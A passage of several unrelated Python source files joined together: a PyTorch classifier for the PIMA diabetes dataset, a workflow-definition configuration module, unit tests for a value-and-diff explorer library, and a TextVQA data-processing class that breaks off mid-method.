        standardized (scaler fit on train only); y arrays have shape (n, 1).
    """
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import StandardScaler
    if not os.path.exists(local_data_path):
        print('Fetching data from URL...')
        df = pd.read_csv(url)
        # FIX: create the cache directory first — to_csv raised
        # FileNotFoundError when ./data did not exist.
        os.makedirs(os.path.dirname(local_data_path), exist_ok=True)
        df.to_csv(local_data_path)
    else:
        df = pd.read_csv(local_data_path, index_col=0)
    print(df.shape)
    print(df.head())
    # Last column is the label; everything else is a feature.
    X = df.iloc[:, :-1].values
    y = df.iloc[:, -1].values
    print(
        f"Raw data shapes -> X.shape: {X.shape} - y.shape: {y.shape} - label dist: {np.bincount(y)}")
    # split into train/test sets (stratified to preserve label balance)
    X_train, X_test, y_train, y_test = \
        train_test_split(X, y, test_size=test_split,
                         random_state=SEED, stratify=y)
    if upsample:
        # Duplicate random minority-class rows until classes are balanced.
        difference = sum((y_train == 0)*1) - sum((y_train == 1)*1)
        indices = np.where(y_train == 1)[0]
        rand_subsample = np.random.randint(0, len(indices), (difference,))
        X_train = np.concatenate((X_train, X_train[indices[rand_subsample]]))
        y_train = np.concatenate((y_train, y_train[indices[rand_subsample]]))
    # Carve a validation split out of the (possibly upsampled) training data.
    X_train, X_val, y_train, y_val = \
        train_test_split(X_train, y_train, test_size=test_split,
                         random_state=SEED, stratify=y_train)
    # scale data: fit on train only so val/test stay leakage-free
    ss = StandardScaler()
    X_train = ss.fit_transform(X_train)
    X_val = ss.transform(X_val)
    X_test = ss.transform(X_test)
    # Targets become column vectors to match the model's (n, 1) output.
    y_train = np.expand_dims(y_train, axis=1)
    y_val = np.expand_dims(y_val, axis=1)
    y_test = np.expand_dims(y_test, axis=1)
    print(f"X_train.shape: {X_train.shape} - y_train.shape: {y_train.shape}\n" +
          f"X_val.shape: {X_val.shape} - y_val.shape: {y_val.shape}\n" +
          f"X_test.shape: {X_test.shape} - y_test.shape: {y_test.shape}")
    return (X_train, y_train), (X_val, y_val), (X_test, y_test)
class PimaDataset(Dataset):
    """Dataset adapter serving (features, target) pairs as float32 tensors."""

    def __init__(self, X, y):
        super(PimaDataset, self).__init__()
        # Convert once up front so __getitem__ is a cheap index lookup.
        self.X = torch.FloatTensor(X)
        self.y = torch.FloatTensor(y)

    def __len__(self):
        # One sample per feature row.
        return len(self.X)

    def __getitem__(self, item):
        return self.X[item], self.y[item]
# our ANN
class PimaModel(pytk.PytkModule):
    """MLP for binary classification: 8 -> 16 -> 8 -> 4 -> 1 (sigmoid).

    Dropout (p=0.20) after the first two hidden layers regularizes the
    small dataset. Output is a probability, paired with BCELoss.
    """

    def __init__(self):
        super(PimaModel, self).__init__()
        self.fc1 = nn.Linear(8, 16)
        self.fc2 = nn.Linear(16, 8)
        self.fc3 = nn.Linear(8, 4)
        self.out = nn.Linear(4, 1)

    def forward(self, inp):
        x = F.relu(self.fc1(inp))
        x = F.dropout(x, p=0.20, training=self.training)
        x = F.relu(self.fc2(x))
        x = F.dropout(x, p=0.20, training=self.training)
        x = F.relu(self.fc3(x))
        # FIX: F.sigmoid is deprecated (removed in newer PyTorch);
        # torch.sigmoid is the supported equivalent.
        x = torch.sigmoid(self.out(x))
        return x
# Script-mode switches: which phases main() executes.
DO_TRAINING = True
DO_TESTING = False  # NOTE(review): not referenced anywhere in the visible code
DO_PREDICTION = False
MODEL_SAVE_PATH = './model_states/pyt_diabetes_ann'
# Hyper-parameters
# NOTE(review): NUM_FEATURES/NUM_CLASSES look stale — PimaModel is hard-wired
# to 8 inputs and 1 output; confirm before relying on these values.
NUM_FEATURES = 30
NUM_CLASSES = 1
NUM_EPOCHS = 2500
BATCH_SIZE = 32
LEARNING_RATE = 1e-3
DECAY = 0.005
def main():
    """Train, evaluate, save and (optionally) predict with the PIMA MLP."""
    # Pre-split, pre-scaled arrays; minority class upsampled for training.
    (X_train, y_train), (X_val, y_val), (X_test, y_test) = load_data(upsample=True)
    ds_train = PimaDataset(X_train, y_train)
    ds_val = PimaDataset(X_val, y_val)
    ds_test = PimaDataset(X_test, y_test)
    if DO_TRAINING:
        print('Building model...')
        net = PimaModel()
        # Sigmoid output -> binary cross-entropy loss.
        criterion = nn.BCELoss()  # nn.CrossEntropyLoss()
        opt = torch.optim.Adam(
            net.parameters(), lr=LEARNING_RATE, weight_decay=DECAY)
        net.compile(loss=criterion, optimizer=opt, metrics=['acc'])
        print(net)
        print('Training model...')
        hist = net.fit_dataset(ds_train, validation_dataset=ds_val,
                               epochs=NUM_EPOCHS, batch_size=BATCH_SIZE, report_interval=100)
        pytk.show_plots(hist, metric='acc',
                        plot_title="Performance Metrics")
        # Report loss/accuracy on all three splits.
        print('\nEvaluating model performance...')
        loss, acc = net.evaluate_dataset(ds_train)
        print(f"  Training dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
        loss, acc = net.evaluate_dataset(ds_val)
        print(f"  Cross-val dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
        loss, acc = net.evaluate_dataset(ds_test)
        print(f"  Testing dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
        # Persist the trained weights, then drop the in-memory model.
        net.save(MODEL_SAVE_PATH)
        del net
    if DO_PREDICTION:
        print('\nRunning predictions...')
        net = pytk.load_model(MODEL_SAVE_PATH)
        _, y_pred = net.predict_dataset(X_test)
        print('Sample labels: ', y_test.flatten())
        print('Sample predictions: ', y_pred)
        print('We got %d/%d correct!' %
              ((y_test.flatten() == y_pred).sum(), len(y_test.flatten())))
if __name__ == "__main__":
    main()
# --------------------------------------------------
# Results:
# MLP with epochs=100, batch-size=16, LR=0.001
# Training -> acc: 98.63, f1-score: 98.11
# Testing -> acc: 99.22, f1-score: 99.06
# --------------------------------------------------
# NOTE(review): the results above cite epochs=100/batch=16, which does not
# match this file's defaults (2500/32) — presumably copied from a different
# experiment; verify before quoting.
|
# coding=utf-8
"""Module for handling workflow definition objects.
Intended for registering a new workflow type with the Configuration database.
"""
import ast
import json
from os.path import dirname, join
import jsonschema
from .. import ConfigDb
DB = ConfigDb()
def add(workflow_definition: dict, templates_root: str):
    """Add a workflow definition to the Configuration Database.
    Templates are expected to be found in a directory tree with the following
    structure:
    - workflow_id:
        |- workflow_version
            |- stage_id
                |- stage_version
                    |- <templates>
    Args:
        workflow_definition (dict): Workflow definition.
        templates_root (str): Workflow templates root path
    Raises:
        jsonschema.ValidationError: if the definition fails schema validation.
        KeyError: if a definition with the same id and version already exists.
    """
    # Validate against the JSON schema shipped next to this module.
    schema_path = join(dirname(__file__), 'schema', 'workflow_definition.json')
    with open(schema_path, 'r') as file:
        schema = json.load(file)
    jsonschema.validate(workflow_definition, schema)
    # Replace template filenames in the definition with file contents.
    _load_templates(workflow_definition, templates_root)
    workflow_id = workflow_definition['id']
    version = workflow_definition['version']
    name = "workflow_definitions:{}:{}".format(workflow_id, version)
    if DB.get_keys(name):
        raise KeyError('Workflow definition already exists: {}'.format(name))
    DB.save_dict(name, workflow_definition, hierarchical=False)
def register(workflow_id, workflow_version):
    """Register an (empty) workflow definition in the database."""
    key = "workflow_definitions:{}:{}".format(workflow_id, workflow_version)
    # A fresh definition starts with no stages.
    definition = dict(id=workflow_id, version=workflow_version, stages=[])
    DB.save_dict(key, definition, hierarchical=False)
def delete(workflow_id: str = None, workflow_version: str = None):
    """Delete workflow definitions.
    Args:
        workflow_id (str, optional): Optional workflow identifier
        workflow_version (str, optional): Optional workflow identifier version
    If workflow_id and workflow_version are None, delete all workflow
    definitions.
    """
    if workflow_id is None and workflow_version is None:
        pattern = "workflow_definitions:*"
    elif workflow_id is not None and workflow_version is None:
        pattern = "workflow_definitions:{}:*".format(workflow_id)
    elif workflow_id is None and workflow_version is not None:
        pattern = "workflow_definitions:*:{}".format(workflow_version)
    else:
        # Both given: delete the single fully-qualified key directly.
        name = "workflow_definitions:{}:{}".format(workflow_id,
                                                   workflow_version)
        DB.delete(name)
        return
    keys = DB.get_keys(pattern)
    # FIX: guard against an empty match — DB.delete(*[]) would issue a
    # zero-argument delete, which backends such as Redis reject.
    if keys:
        DB.delete(*keys)
def get_workflow(workflow_id: str, workflow_version: str) -> dict:
    """Get a workflow definition from the Configuration Database.
    Args:
        workflow_id (str): Workflow identifier
        workflow_version (str): Workflow version
    Returns:
        dict, Workflow definition dictionary
    """
    key = "workflow_definitions:{}:{}".format(workflow_id, workflow_version)
    workflow = DB.get_hash_dict(key)
    # 'stages' comes back as the string repr of a list; rebuild the object.
    workflow['stages'] = ast.literal_eval(workflow['stages'])
    return workflow
def get_workflows() -> dict:
    """Get dict of ALL known workflow definitions.
    Returns
        dict mapping workflow id -> list of known versions.
    """
    known_workflows = dict()
    # Keys look like "workflow_definitions:<id>:<version>".
    for key in DB.get_keys("workflow_definitions:*"):
        parts = key.split(':')
        known_workflows.setdefault(parts[1], list()).append(parts[2])
    return known_workflows
def _load_templates(workflow: dict, templates_root: str):
    """Load templates keys.

    For every stage config key containing 'template', replace the template
    filename value with the contents of that file, looked up under
    templates_root/<workflow id>/<workflow version>/<stage id>/<stage version>.
    Mutates ``workflow`` in place.
    """
    base_path = join(templates_root, workflow['id'], workflow['version'])
    for stage in workflow['stages']:
        stage_path = join(base_path, stage['id'], stage['version'])
        for config_type in ('ee_config', 'app_config'):
            config = stage[config_type]
            for key, value in list(config.items()):
                if 'template' not in key:
                    continue
                with open(join(stage_path, value), 'r') as file:
                    config[key] = file.read()
|
from nose.tools import assert_raises
from syn.types.a import ValueExplorer, ExplorationError, DiffExplorer, \
visit, find_ne
from syn.base_utils import capture, assign
import syn.base_utils.repl as repl
#-------------------------------------------------------------------------------
# NETypes
def test_netypes():
    """Exercise the NEType hierarchy: equality, messages, and explorers."""
    from syn.types.a import NEType, NotEqual, DiffersAtIndex, DiffersAtKey, \
        DifferentLength, DifferentTypes, SetDifferences, KeyDifferences, \
        DiffersAtAttribute
    class Foo(object):
        def __init__(self, a):
            self.a = a
    # Base NEType: repr/str agree, equality is by (A, B, type).
    n = NEType(1, 2)
    assert str(n) == repr(n)
    x = n.explorer()
    assert x.current_value == (1, 2)
    assert n == NEType(1, 2)
    assert n != NEType(1, 3)
    assert n != NotEqual(1, 2)
    n = NotEqual(1, 2)
    assert str(n) == '1 != 2'
    # Calling a NEType prints its message and launches its explorer;
    # stub the explorer so the call is side-effect-observable only.
    accum = []
    def fake_explorer():
        def func():
            accum.append(1)
        return func
    assert sum(accum) == 0
    with capture() as (out, err):
        with assign(n, 'explorer', fake_explorer):
            n()
    assert sum(accum) == 1
    assert out.getvalue() == '1 != 2\n'
    # Sequence difference at a single index.
    l1 = [1, 2, 3]
    l2 = [1, 4, 3]
    n = DiffersAtIndex(l1, l2, 1)
    assert n.explorer().current_value == (2, 4)
    assert n.message() == 'Sequences differ at index 1: 2 != 4'
    assert DiffersAtIndex(l1, l2, 1) == DiffersAtIndex(l1, l2, 1)
    assert DiffersAtIndex(l1, l2, 1) != DiffersAtIndex(l1, l2, 2)
    assert DiffersAtIndex(l1, l2, 1) != DiffersAtIndex(l1, l1, 1)
    # Mapping difference at a single key.
    d1 = dict(a=1, b=2)
    d2 = dict(a=1, b=3)
    n = DiffersAtKey(d1, d2, key='b')
    assert n.explorer().current_value == (2, 3)
    assert n.message() == 'Mappings differ at key "b": 2 != 3'
    assert DiffersAtKey(d1, d2, 'a') == DiffersAtKey(d1, d2, 'a')
    assert DiffersAtKey(d1, d2, 'a') != DiffersAtKey(d1, d2, 'b')
    assert DiffersAtKey(d1, d2, 'a') != DiffersAtKey(d1, d1, 'a')
    # Length and type mismatches.
    l1 = [1, 2]
    l2 = [1, 2, 3]
    n = DifferentLength(l1, l2)
    assert n.message() == 'Different lengths: 2 != 3'
    l1 = [1, 2]
    l2 = (1, 2, 3)
    n = DifferentTypes(l1, l2)
    assert n.message() == ('Different types: {} != {}'
                           .format(str(list), str(tuple)))
    # Symmetric-difference style reports for sets and dict keys.
    s1 = {1, 2, 3}
    s2 = {2, 3, 4}
    n = SetDifferences(s1, s2)
    assert n.message() == 'Exclusive items: {}'.format({1, 4})
    d1 = dict(a=1, b=2)
    d2 = dict(b=2)
    n = KeyDifferences(d1, d2)
    assert n.message() == 'Exclusive keys: {}'.format({'a'})
    n = KeyDifferences(d2, d1)
    assert n.message() == 'Exclusive keys: {}'.format({'a'})
    # Object attribute difference.
    f1 = Foo(1)
    f2 = Foo(2)
    n = DiffersAtAttribute(f1, f2, 'a')
    assert n.message() == 'Objects differ at attribute "a": 1 != 2'
    assert n != NotEqual(1, 2)
    assert n.explorer().current_value == (1, 2)
#-------------------------------------------------------------------------------
# ValueExplorer
def test_valueexplorer():
    """Walk ValueExplorer through scalars, sequences, dicts, strings, and
    objects; the step/down/up sequences below are strictly order-dependent."""
    # Scalars are leaves: no stepping or vertical movement possible.
    x = ValueExplorer(1)
    assert x.value == 1
    assert x.current_value == 1
    assert x.display() == u'1'
    with capture() as (out, err):
        x.command_display_value()
    assert out.getvalue() == '1\n'
    assert_raises(ExplorationError, x.step)
    assert_raises(ExplorationError, x.down)
    assert_raises(ExplorationError, x.up)
    # Horizontal stepping across a flat list, then down/up at the end.
    x = ValueExplorer([1, 2, 3])
    assert x.current_value == 1
    x.step()
    assert x.current_value == 2
    x.step()
    assert x.current_value == 3
    assert_raises(ExplorationError, x.step)
    assert_raises(ExplorationError, x.up)
    x.down()
    assert x.value == 3
    assert x.current_value == 3
    x.up()
    assert x.value == [1, 2, 3]
    assert x.current_value == 3
    assert_raises(ExplorationError, x.step)
    x.down()
    assert x.value == 3
    x.up()
    assert x.current_value == 3
    # Negative steps walk backwards; positive steps walk forwards again.
    x.step(-1)
    assert x.current_value == 2
    x.step()
    assert x.current_value == 1
    assert_raises(ExplorationError, x.step)
    x.step(1)
    assert x.current_value == 2
    x.step()
    assert x.current_value == 3
    assert_raises(ExplorationError, x.step)
    x.reset()
    # depth_first yields the container itself before its elements.
    assert list(x.depth_first()) == [[1, 2, 3], 1, 2, 3]
    x = ValueExplorer([])
    assert x.value == []
    assert x.current_value is None
    assert_raises(ExplorationError, x.step)
    assert list(x.depth_first()) == [[]]
    # Nested lists, and the effect of a starting index on traversal.
    l = [1, [2, 3], 4]
    x = ValueExplorer(l)
    assert list(x.depth_first()) == [l, 1, [2, 3], 2, 3, 4]
    x = ValueExplorer(l, index=1)
    assert list(x.depth_first()) == [l, [2, 3], 2, 3, 4]
    x = ValueExplorer(l, index=2)
    assert list(x.depth_first()) == [l, 4]
    x = ValueExplorer(l, index=3)
    assert list(x.depth_first()) == []
    l = [1, [2, 3], [[4]]]
    x = ValueExplorer(l)
    assert list(x.depth_first()) == [l, 1, [2, 3], 2, 3, [[4]], [4], 4]
    # Dicts: traversal order is unspecified, so compare as sets.
    d = dict(a=1, b=2)
    x = ValueExplorer(d)
    assert set(list(x.depth_first())[1:]) == {1, 2}
    d = dict(a=1, b=2, c=(3, 4))
    x = ValueExplorer(d)
    assert set(list(x.depth_first())[1:]) == {1, 2, (3, 4), 3, 4}
    assert ValueExplorer(d, key='a').current_value == 1
    assert ValueExplorer(d, key='b').current_value == 2
    assert ValueExplorer(d, key='c').current_value == (3, 4)
    assert_raises(ExplorationError, ValueExplorer, d, key='d')
    d = dict(a=1, b=2, c=dict(a=3, b=4))
    x = ValueExplorer(d)
    dfl = list(item for item in x.depth_first() if not isinstance(item, dict))
    assert set(dfl) == {1, 2, 3, 4}
    x.reset()
    assert set(x.depth_first(leaves_only=True)) == {1, 2, 3, 4}
    # Manual walk into a nested dict value; at_end flags exhaustion.
    s = set()
    x = ValueExplorer(d, key='c')
    assert x.current_value == dict(a=3, b=4)
    x.down()
    s.add(x.current_value)
    x.step()
    s.add(x.current_value)
    assert_raises(ExplorationError, x.step)
    assert x.at_end
    assert s == {3, 4}
    # Strings iterate per character.
    s = 'abcd'
    x = ValueExplorer(s)
    assert list(x.depth_first()) == ['abcd', 'a', 'b', 'c', 'd']
    s = ''
    x = ValueExplorer(s)
    assert list(x.depth_first()) == ['']
    x = ValueExplorer([])
    assert list(x.depth_first()) == [[]]
    # Plain objects iterate over their attribute values.
    class Foo(object):
        def __init__(self, a, b):
            self.a = a
            self.b = b
    f = Foo(1, 2)
    x = ValueExplorer(f)
    assert list(x.depth_first()) == [f, 1, 2]
    #assert list(x.depth_first(leaves_only=True)) == [1, 2]
    x = ValueExplorer(f, attr='b')
    assert x.value is f
    assert x.current_value == 2
    assert x.attr == 'b'
    assert x.index == 1
    assert_raises(ExplorationError, ValueExplorer, f, attr='c')
    # REPL command interface: c=current, l=value, n=step, d=down, u=up.
    def last_line(si):
        return si.getvalue().split('\n')[-2]
    l = [1, [2, 3], [[4]]]
    r = ValueExplorer(l)
    with capture() as (out, err):
        r._eval('c')
        assert last_line(out) == '1'
        r._eval('l')
        assert last_line(out) == '[1, [2, 3], [[4]]]'
        r._eval('n 2')
        r._eval('c')
        assert last_line(out) == '[[4]]'
        r._eval('d 2')
        r._eval('c')
        assert last_line(out) == '4'
        r._eval('u 2')
        r._eval('c')
        assert last_line(out) == '[[4]]'
        r._eval('n -1')
        r._eval('c')
        assert last_line(out) == '[2, 3]'
#-------------------------------------------------------------------------------
# DiffExplorer
def test_diffexplorer():
    """Walk DiffExplorer over paired values; step order is significant."""
    # Lockstep traversal of two lists; display shows both sides.
    l1 = [1, 2, 3]
    l2 = [1, 2, 4]
    x = DiffExplorer(l1, l2)
    assert x.display() == u'A: 1\nB: 1'
    assert x.current_value == (1, 1)
    x.step()
    assert x.display() == u'A: 2\nB: 2'
    x.down()
    assert x.display() == u'A: 2\nB: 2'
    x.up()
    assert x.display() == u'A: 2\nB: 2'
    x.step()
    assert x.display() == u'A: 3\nB: 4'
    assert_raises(ExplorationError, x.step)
    # Walk backwards to the start, then reset and list the full traversal.
    x.step(-1)
    assert x.display() == u'A: 2\nB: 2'
    x.step()
    assert x.display() == u'A: 1\nB: 1'
    assert_raises(ExplorationError, x.step)
    x.reset()
    assert list(x.depth_first()) == [(l1, l2), (1, 1), (2, 2), (3, 4)]
    # REPL command interface over nested lists (c/l/n/d/u as in
    # ValueExplorer); display() emits two lines, hence the [-3:-1] slice.
    def last_lines(si):
        return si.getvalue().split('\n')[-3:-1]
    l1 = [1, [2, 3], [[4]]]
    l2 = [1, [2, 6], [[5]]]
    r = DiffExplorer(ValueExplorer(l1), ValueExplorer(l2))
    with capture() as (out, err):
        r._eval('c')
        assert last_lines(out) == ['A: 1', 'B: 1']
        r._eval('l')
        assert last_lines(out) == ['A: [1, [2, 3], [[4]]]',
                                   'B: [1, [2, 6], [[5]]]']
        r._eval('n 2')
        r._eval('c')
        assert last_lines(out) == ['A: [[4]]', 'B: [[5]]']
        r._eval('d 2')
        r._eval('c')
        assert last_lines(out) == ['A: 4', 'B: 5']
        r._eval('u 2')
        r._eval('c')
        assert last_lines(out) == ['A: [[4]]', 'B: [[5]]']
        r._eval('n -1')
        r._eval('c')
        assert last_lines(out) == ['A: [2, 3]', 'B: [2, 6]']
    # Plain dicts are accepted directly (wrapped internally).
    d1 = dict(a = 1)
    d2 = dict(a = 2)
    r = DiffExplorer(d1, d2)
    with capture() as (out, err):
        r._eval('c')
        assert last_lines(out) == ['A: 1', 'B: 2']
        r._eval('l')
        assert last_lines(out) == ["A: {'a': 1}", "B: {'a': 2}"]
    # find_ne returns a callable report; drive its interactive loop with a
    # stubbed raw_input ('f' once to find, then 'q' to quit).
    class Bar(object):
        def __init__(self, a, b):
            self.a = a
            self.b = b
    b1 = Bar(1, [2, 3, 'abc'])
    b2 = Bar(1, [2, 3, 'adc'])
    accum = []
    def fake_input(prompt):
        accum.append(1)
        if sum(accum) <= 1:
            return 'f'
        return 'q'
    r = find_ne(b1,b2)
    with assign(repl, 'raw_input', fake_input):
        r()
#-------------------------------------------------------------------------------
# Utilities
def test_deep_comp():
    """deep_comp with a custom comparator and the leaves_only flag."""
    from syn.types.a.ne import deep_comp
    from syn.base_utils import feq
    from functools import partial
    # Float comparison with a loose 0.1 tolerance.
    cfeq = partial(feq, tol=0.1)
    assert cfeq(4.05, 4.06)
    # Custom comparator: approximate for same-typed floats, exact otherwise.
    def comp(a, b, func=cfeq):
        if isinstance(a, float) and type(a) is type(b):
            return func(a, b)
        return a == b
    l1 = [1, 2, [3, 4.05]]
    l2 = [1, 2, [3, 4.06]]
    assert deep_comp(l1, l1)
    assert not deep_comp(l1, l2)
    # Without leaves_only the containers themselves are compared (exactly),
    # so the custom comparator alone is not enough.
    assert not deep_comp(l1, l2, comp)
    assert deep_comp(l1, l2, comp, leaves_only=True)
    # A tolerance tighter than the 0.01 gap must fail.
    assert not deep_comp(l1, l2, partial(comp, func=partial(feq, tol=0.001)),
                         leaves_only=True)
    dcomp = partial(deep_comp, func=comp, leaves_only=True)
    assert dcomp(l1, l2)
def test_deep_feq():
    """deep_feq: structural equality with optional numeric tolerance."""
    from syn.types.a import deep_feq
    # Structurally identical values compare equal at the default tolerance.
    for lhs, rhs in [('abc', 'abc'), ([], []), ([1, 2], [1, 2])]:
        assert deep_feq(lhs, rhs)
    # Length, container-type, and value mismatches (including nested ones
    # and small numeric gaps at default tolerance) all compare unequal.
    for lhs, rhs in [('abc', 'ab'), ([], ()), ([1, 2], [1]),
                     ([[1, 2]], [(1, 2)]), ([[]], [()]),
                     (1, 1.01), (1j, 1.01j), ([1], [1.01])]:
        assert not deep_feq(lhs, rhs)
    # A loose tolerance absorbs small real/complex gaps, even nested.
    for lhs, rhs in [(1, 1.01), (1j, 1.01j), ([1], [1.01]), ([1j], [1.01j])]:
        assert deep_feq(lhs, rhs, tol=0.1)
def test_is_visit_primitive():
    """is_visit_primitive: values visit() yields whole, not item-by-item."""
    from syn.types.a import is_visit_primitive
    class Foo(object):
        pass
    f = Foo()
    # Numbers, types, and 1-char strings are primitive; containers and
    # multi-char strings are not.
    assert is_visit_primitive(1)
    assert is_visit_primitive(int)
    assert is_visit_primitive(Foo)
    assert not is_visit_primitive([1, 2, 3])
    assert is_visit_primitive('a')
    assert not is_visit_primitive('ab')
    # An attribute-less instance is primitive and visits as itself...
    assert is_visit_primitive(f)
    assert list(visit(f)) == [f]
    # ...but gains (name, value) visitation once it has attributes.
    f.a = 1
    assert not is_visit_primitive(f)
    assert list(visit(f)) == [('a', 1)]
#-------------------------------------------------------------------------------
# Allow running this module directly via syn's own test runner.
if __name__ == '__main__': # pragma: no cover
    from syn.base_utils import run_all_tests
    run_all_tests(globals(), verbose=True, print_errors=False)
|
import numpy as np
import torch
from ..builder import build_processor
from imix.utils.third_party_libs import VocabDict
from ..utils.stream import ItemFeature
from .base_infocpler import BaseInfoCpler
from imix.utils.config import imixEasyDict
from imix.utils.common_function import object_to_byte_tensor
from copy import deepcopy
import json
import os
class TextVQAAnswerProcessor:
    """Wraps the answer vocabulary and exposes its special-token indices."""
    def __init__(self, vocab_file: str):
        # Load the answer vocabulary and cache the special-token indices.
        self.answer_vocab = VocabDict(vocab_file)
        self.PAD_IDX = self.answer_vocab.word2idx('<pad>')
        self.BOS_IDX = self.answer_vocab.word2idx('<s>')
        self.EOS_IDX = self.answer_vocab.word2idx('</s>')
        self.UNK_IDX = self.answer_vocab.UNK_INDEX
        # make sure PAD_IDX, BOS_IDX and EOS_IDX are valid (not <unk>)
        assert self.PAD_IDX != self.answer_vocab.UNK_INDEX
        assert self.BOS_IDX != self.answer_vocab.UNK_INDEX
        assert self.EOS_IDX != self.answer_vocab.UNK_INDEX
        # Padding must map to index 0.
        assert self.PAD_IDX == 0
    def get_true_vocab_size(self):
        """Return the number of words in the answer vocabulary."""
        return self.answer_vocab.num_vocab
class TextVQAInfoCpler(BaseInfoCpler):
    """Completes a raw TextVQA ItemFeature into a model-ready sample.

    Runs the configured text, object, OCR, and answer processors in turn
    (see ``complete_info``) and assembles their outputs on a fresh
    ItemFeature.
    """
    def __init__(self, cfg):
        # NOTE(review): BaseInfoCpler.__init__ is never invoked here —
        # confirm that is intentional.
        self.cfg = cfg
        # Feature toggles read from the config.
        self.use_ocr = self.cfg.use_ocr
        self.use_ocr_info = self.cfg.use_ocr_info
        self.use_order_vectors = self.cfg.use_order_vectors
        self.return_features_info = self.cfg.return_features_info
        # Optional directory of precomputed PHOC features; when set, PHOC is
        # loaded from JSON files instead of computed by a processor.
        self.phoc_feature_path = getattr(self.cfg, 'phoc_feature_path', None)
        self._init_processors()
    def _init_processors(self):
        """Build all sub-processors from their config sections."""
        self._init_text_processor()
        self._init_copy_processor()
        self._init_ocr_processor()
        self._init_answer_processor()
    def _init_answer_processor(self):
        # deepcopy so build_processor cannot mutate the shared config.
        config = deepcopy(self.cfg.answer_processor)
        self.answer_processor = build_processor(config)
    def _init_copy_processor(self):
        config = deepcopy(self.cfg.copy_processor)
        self.copy_processor = build_processor(config)
    def _init_text_processor(self):
        config = deepcopy(self.cfg.text_processor)
        self.text_processor = build_processor(config)
    def _init_ocr_processor(self):
        """Build the token/PHOC/context/bbox processors of the OCR pipeline."""
        ocr_token_processor_cfg = deepcopy(self.cfg.ocr_token_processor)
        self.ocr_token_processor = build_processor(ocr_token_processor_cfg)
        # Only build a PHOC processor when no precomputed features exist.
        if self.phoc_feature_path is None:
            phoc_cfg = deepcopy(self.cfg.phoc_processor)
            self.phoc_processor = build_processor(phoc_cfg)
        else:
            self.phoc_processor = None
        context_cfg = deepcopy(self.cfg.context_processor)
        self.context_processor = build_processor(context_cfg)
        bbox_cfg = deepcopy(self.cfg.bbox_processor)
        self.bbox_processor = build_processor(bbox_cfg)
    def complete_info(self, item_feature: ItemFeature):
        """Run all processors over ``item_feature``; return the new sample."""
        current_sample = ItemFeature()
        # 1. Load text (question words)
        current_sample = self.add_question_info(item_feature, current_sample)
        # 2. Load object
        # object bounding box information
        current_sample = self.add_object_info(item_feature, current_sample)
        # 3. Load OCR
        current_sample = self.add_ocr_info(item_feature, current_sample)
        # 4. load answer
        current_sample = self.add_answer_info(item_feature, current_sample)
        return current_sample
    def add_question_info(self, item_feature: ItemFeature, sample: ItemFeature):
        """Tokenize the question and attach text ids/length to the sample."""
        question_str = (item_feature['question'] if 'question' in item_feature else item_feature['question_str'])
        text_processor_args = {'text': question_str}
        if 'question_tokens' in item_feature:
            text_processor_args['tokens'] = item_feature['question_tokens']
        processed_question = self.text_processor(text_processor_args)
        # BERT-style processors return 'input_ids'; others return vectors.
        if 'input_ids' in processed_question:
            sample.text = processed_question['input_ids']
            sample.text_len = torch.tensor(len(processed_question['tokens']), dtype=torch.long)
        else:
            # For GLoVe based processors
            sample.text = processed_question['text']
            sample.text_len = processed_question['length']
        return sample
    def add_object_info(self, item_feature: ItemFeature, sample: ItemFeature):
        """Copy the object bounding boxes onto the sample, when present."""
        if 'obj_normalized_boxes' in item_feature and hasattr(self, 'copy_processor'):
            sample.obj_bbox_coordinates = self.copy_processor({'blob': item_feature['obj_normalized_boxes']})['blob']
        return sample
    def add_ocr_info(self, item_feature: ItemFeature, sample: ItemFeature):
        """Attach OCR tokens, FastText/PHOC features, order vectors, boxes."""
        sample_info = item_feature
        if not self.use_ocr:
            # remove all OCRs from the sample
            # (i.e. make an empty OCR list)
            sample_info['ocr_tokens'] = []
            sample_info['ocr_info'] = []
            if 'ocr_normalized_boxes' in sample_info:
                sample_info['ocr_normalized_boxes'] = np.zeros((0, 4), np.float32)
            # clear OCR visual features
            if 'image_feature_1' in sample:
                sample.image_feature_1 = torch.zeros_like(sample.image_feature_1)
            return sample
        # Preprocess OCR tokens
        if hasattr(self, 'ocr_token_processor'):
            ocr_tokens = [self.ocr_token_processor({'text': token})['text'] for token in sample_info['ocr_tokens']]
        else:
            ocr_tokens = sample_info['ocr_tokens']
        # Get FastText embeddings for OCR tokens
        context = self.context_processor({'tokens': ocr_tokens})
        sample.context = context['text']
        sample.ocr_tokens = context['tokens']
        sample.context_tokens = object_to_byte_tensor(context['tokens'])
        sample.context_feature_0 = context['text']
        sample.context_info_0 = imixEasyDict()
        sample.context_info_0.max_features = context['length']
        # Get PHOC embeddings for OCR tokens
        if hasattr(self, 'phoc_processor'):
            # phoc_processor is None when precomputed features are used.
            if self.phoc_processor is None:
                if item_feature.context_phoc is None:
                    phoc_file_name = f'{item_feature.set_name}_qid_{item_feature.question_id}.json'
                    context_phoc = self.get_phoc_feature(file_name=phoc_file_name)
                else:
                    context_phoc = item_feature.context_phoc
                sample.context_feature_1 = torch.Tensor(context_phoc['text'])
                sample.context_info_1 = imixEasyDict()
                sample.context_info_1.max_features = torch.tensor(context_phoc['length'])
            else:
                context_phoc = self.phoc_processor({'tokens': ocr_tokens})
                sample.context_feature_1 = context_phoc['text']
                sample.context_info_1 = imixEasyDict()
                sample.context_info_1.max_features = context_phoc['length']
        # OCR order vectors
        # NOTE(review): reads cfg directly instead of self.use_order_vectors
        # set in __init__ — confirm the two are equivalent.
        if self.cfg.get('use_order_vectors', False):
            # Identity rows mark OCR positions; zero out padded slots.
            order_vectors = np.eye(len(sample.ocr_tokens), dtype=np.float32)
            order_vectors = torch.from_numpy(order_vectors)
            order_vectors[context['length']:] = 0
            sample.order_vectors = order_vectors
        # OCR bounding box information
        if 'ocr_normalized_boxes' in sample_info and hasattr(self, 'copy_processor'):
            # New imdb format: OCR bounding boxes are already pre-computed
            max_len = self.cfg.answer_processor.config.max_length
            sample.ocr_bbox_coordinates = self.copy_processor({'blob':
                                                               sample_info['ocr_normalized_boxes']})['blob'][:max_len]
        elif self.use_ocr_info and 'ocr_info' in sample_info:
            # Old imdb format: OCR bounding boxes are computed on-the-fly
            # from ocr_info
            sample.ocr_bbox_coordinates = self.bbox_processor({'info': sample_info['ocr_info']})['bbox'].coordinates
        return sample
    def add_answer_info(self, item_feature: ItemFeature, sample: ItemFeature):
        """Run the answer processor and attach answers/targets to the sample."""
        sample_info = item_feature
